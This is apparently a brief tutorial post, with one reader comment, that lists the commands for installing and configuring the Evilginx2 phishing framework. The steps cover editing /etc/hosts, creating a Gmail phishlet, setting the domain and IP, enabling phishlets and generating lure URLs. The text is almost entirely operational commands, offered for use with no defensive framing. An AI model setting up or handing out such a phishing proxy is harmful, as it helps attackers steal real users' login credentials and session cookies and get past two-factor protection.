sudo apt install evilginx2
evilginx2 -h
cd /usr/share/evilginx2/phishlets
sudo nano /etc/hosts
add 127.0.0.1 and the name of the phishing domain to use
add your own phishlet : touch gmail.yaml
watch for phish_sub end points and add to your sudo nano /etc/hosts file
sudo evilginx2 --developer
COMMANDS NEEDED
config domain example.com
config ipv4 127.0.0.1
phishlets hostname phishlet_name example.com
phishlets enable phishlet_name
lures create phishlet_name
lures get-url 2
Mine keeps on saying site cant be reached
ReplyDelete